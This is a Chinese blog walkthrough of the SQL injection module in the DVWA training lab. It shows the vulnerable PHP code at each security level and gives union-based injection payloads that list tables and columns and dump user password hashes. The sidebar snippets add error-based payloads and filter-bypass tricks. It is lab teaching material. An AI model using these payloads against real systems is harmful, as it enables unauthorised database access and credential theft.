dvwa之SQL Injection

最新推荐文章于 2024-03-19 16:41:37 发布
最新推荐文章于 2024-03-19 16:41:37 发布
阅读量239 收藏
点赞数
分类专栏: dvwa
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17762247/article/details/106491568
版权

一、简介

SQL Injection是一种常见的注入攻击类型,其攻击方式是在客户端的输入数据中插入SQL命令,然后发送到服务端,服务端对数据进行解析,并执行一些非预期的操作。成功的SQL注入攻击能够从数据库中读取敏感数据、篡改数据库数据、对数据库执行管理员操作,甚至执行系统命令,从而造成整个系统被攻击者控制。

二、Low

1、服务器端代码

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

2、漏洞分析
mysqli_fetch_assoc(result):返回代表读取行的关联数组。如果结果集中没有更多的行则返回 null。可以看到,Low级别的代码未对用户输入进行检查和过滤,可以进行sql注入。现实攻击场景下,攻击者是无法看到后端代码的,所以下面的手工注入步骤是建立在无法看到源码的基础上。
3、漏洞利用

  • 手工注入(非盲注)的步骤
    1.判断是否存在注入,注入是字符型还是数字型
    2.猜解SQL查询语句中的字段数
    3.确定显示的字段顺序
    4.获取当前数据库
    5.获取数据库中的表
    6.获取表中的字段名
    7.下载数据

  • 判断是否存在注入,注入是字符型还是数字型
    输入"1",查询成功
    在这里插入图片描述
    输入"1’ and ‘1’ = ‘1 ",查询成功
    在这里插入图片描述
    输入"1’ and ‘1’ = '2 ",查询失败
    在这里插入图片描述
    从上面三个结果可知,存在字符型注入。

  • 猜解SQL查询语句中的字段数
    输入“1’ and 1=1 order by 3 #,查询失败
    在这里插入图片描述
    输入“1′ and 1=1 order by 2 #”,查询成功
    在这里插入图片描述
    说明该SQL语句只查询了两个字段(select column1, column2 from tablename where …),或者表中只有两个字段(select * from tablename)。

  • 确定显示的字段顺序
    输入“1’ union select 1,2#”,查看字段顺序,第一个字段为First name,第二个字段为 Surname
    在这里插入图片描述

  • 获取当前数据库名
    输入1’ union select 1,database()#(不能使用1’ union select database()#,union前后查询语句的字段数必须相同),查询成功。
    在这里插入图片描述

  • 获取数据库中的表名
    group_concat(expr):拼接expr得到的字符串,一般配合group by一起使用,否则结果只有一行
    information_schema:一个元数据库,包含描述数据库的数据,比如有哪些数据库、每个表有哪些表、表有多少字段、字段是什么类型等等。
    information_schema.tables:获取数据库中所有的表
    table_schema:获取所有数据库名
    输入1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,可以看到,dvwa中包含两个表:users和guestbook
    在这里插入图片描述

  • 获取表中的字段名
    输入 1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#,可以看到,该表包含“user_id,first_name,last_name,user,password,avatar,last_login,failed_login”几个字段。
    在这里插入图片描述

  • 下载数据
    输入 1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,数据下载成功。
    在这里插入图片描述

三、Medium

1、服务器端代码


<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];

    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

2、漏洞分析
Medium级别的代码使用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,希望以此控制用户输入,可以利用burpsuite修改请求参数,过程和Low级别代码一致,不再累述。
在这里插入图片描述

四、High

1、服务器端代码


<?php

if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
}

?>

2、漏洞分析
High级别的只是在SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果,可以通过#将其注释掉。手工注入的过程与Low级别基本一样,不再累述。

五、Impossible

1、服务器端代码

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();
        $row = $data->fetch();

        // Make sure only 1 result is returned
        if( $data->rowCount() == 1 ) {
            // Get values
            $first = $row[ 'first_name' ];
            $last  = $row[ 'last_name' ];

            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

2、漏洞分析
Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

wen___lee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA下的SQL注入
07-25
SQL
DVWA下的SQL Injection(Blind)
07-25
盲注
DVWA靶场-SQL Injection (Blind)SQL注入盲注
最新发布
mlws1900的博客
03-19 1226
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
2020-12-06-DVWAsql.md
01-24
dvwasql
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA靶场通关教程】
AuroraMiraitowa的博客
02-21 2039
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA 还可以手动调整靶机源码的安全级别,分别为 Low,Medium,High,Impossible,级别越高,安全防护越严格,渗透难度越大。一般 Low 级别基本没有做防护或者只是最简单的防护,很容易就能够渗透成功;
DVWASQL Injection
baynk的博客
10-29 1663
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
dvwa-SQL Injection
Alter__的博客
05-16 705
是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name,
DVWASQL Injection
鸣蜩十四的博客
06-21 217
SQL Injection: 绕过空格(注释符/* */,%a0) 括号绕过空格 引号绕过(使用十六进制) %df%5c%27 逗号绕过(使用from或者offset) or and xor not绕过:and=&& or=|| xor=| not=! 绕过注释符号(#,--(后面跟一个空格))过滤:id=1' union select 1,2,3||'1 =绕过: 使用like 、rlike 、regexp 或者 使用< 或者 > 绕过union,select,wh...
dvwasql injection
Alsn86的博客
01-18 247
dvwasql injection low,php,没有任何过滤,把sql搜索到的所有记录都输出来 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $html .=$query;//自
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
数据库——SQL注入攻击
weixin_49816179的博客
01-05 1196
讲解SQL注入攻击的原理,讲解基本SQL注入攻击的方法,讲解防SQL注入攻击的基本措施。
DVWA靶场-SQL Injection (Blind) SQL盲注
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-07 1377
往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 DVWA靶场-File Inclusion 文件包含 DVWA靶场-File Upload 文件上传 DVWA靶场-SQL Injection SQL注入 靶场环境搭建 https://github.com/ethicalhack3r/DVWA [网络安全学习篇附]:DVWA 靶场搭建 目录 SQL ..
DVWA-SQL Injection(Blind盲注)
Cwillchris的博客
10-28 817
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: SQLInjection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入 攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 盲注分为基于布尔的盲注、基于时间的盲注以及基于报错.
DVWA系列 —— SQL injection(注入)
weixin_49340699的博客
12-14 513
SQL injection(注入)简介工具low,medium级别high级别impossible级别总结 简介 SQL注入就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意sql的目的 形成sql注入漏洞的原因: 1 用户输入不可控 2 输入内容被带入了SQL语句执行 通过SQL注入可以对程序对应的储存区进行对应的探测 工具 sqlmap brupsuite 环境 kali low,medium级别 第一步输入个1用brupsuite截断 在kali下使
DVWA-SQL Injection
m0_49025459的博客
04-16 1773
LOW 判断注入是否存在 1' order by 2 # 1' order by 3 # 2的时候正常回显,但是3的时候报错,证明存在两个回显点,查询数据库 1' union select 1,database() # 查到数据库之后查询,查表名 1 union select 1,table_name from information_schema.tables where table_schema=database() # 两张表,先查表里的字段语句一样,改一下表.
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值